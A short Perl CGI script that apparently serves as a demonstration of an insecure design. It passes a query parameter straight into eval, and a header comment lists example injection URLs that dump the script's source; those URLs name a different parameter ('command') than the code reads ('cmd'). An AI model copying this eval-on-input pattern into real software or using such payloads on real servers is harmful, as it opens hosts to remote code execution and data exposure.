#!/usr/bin/perl -w
use strict;
=pod
Cracks with either:
http://www.foo.com/cgi-bin/script.cgi?command={ sub { print(qq[Content-Type: text/plain] . chr(10) x 2) and open(F, $ENV{'SCRIPT_FILENAME'}) and print(<F>) } }
http://www.foo.com/cgi-bin/script.cgi?command={sub{print'Content-Type:text/plain'.chr(10)x2%3Bopen(F,$ENV{SCRIPT_FILENAME})%3Bprint<F>}}
=cut
use CGI;
my($cgi) = CGI->new();
my($cmd) = $cgi->param('cmd') || 'foo';
eval( qq[&$cmd] );
exit;
sub foo { print(&page()) }
sub bar {
print
(
&page
(
<<__GREETING__
<p>It's so good to see you
<span
style="
background-color: #FFFFEE;
font-weight: bold;
font-size: 18px;
font-style: oblique;
color: #000080;"> @{[ $cgi->param('name') || 'nameless friend' ]}! </span>
</p>
<p>We're all delighted that you would stop by.</p>
__GREETING__
)
)
}
sub page {
<<__PAGE__
Content-Type: text/html; charset=ISO-8859-1
<?xml version="1.0" encoding='ISO-8859-1'?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
lang="en">
<head>
<title>An insecure CGI script</title>
<meta
http-equiv="Content-Type"
content="text/html; charset=iso-8859-1" />
<style
type="text/css"
xml::space="preserve"><!--
HTML { font-family: Verdana; font-size: 12px; }
--></style>
</head>
<body>
<p> </p>
<div style="padding: 0 0 0 50px;">
@{[
(length(join('', @_)) > 0)
? q[
<div
style="
width: 400px;
border: 1px solid navy;
padding: 5px;">] . join('<br />', @_) . q[</div>]
: <<__insert_form__
<div style="padding: 0 0 0 50px;">
<p style="font-size: 18px;">
<strong>Welcome, new friend.</strong>
</p>
<form
name="Just Another CGI form"
action="@{[ $cgi->script_name() ]}"
method="GET">
What is your name?  
<input
type="text"
name="name"
size="15" />
<input
type="submit"
value="send" />
<input
type="hidden"
name="cmd"
value="bar" />
</form>
</div>
__insert_form__
]}
</div>
<p> </p>
</body>
</html>
__PAGE__
}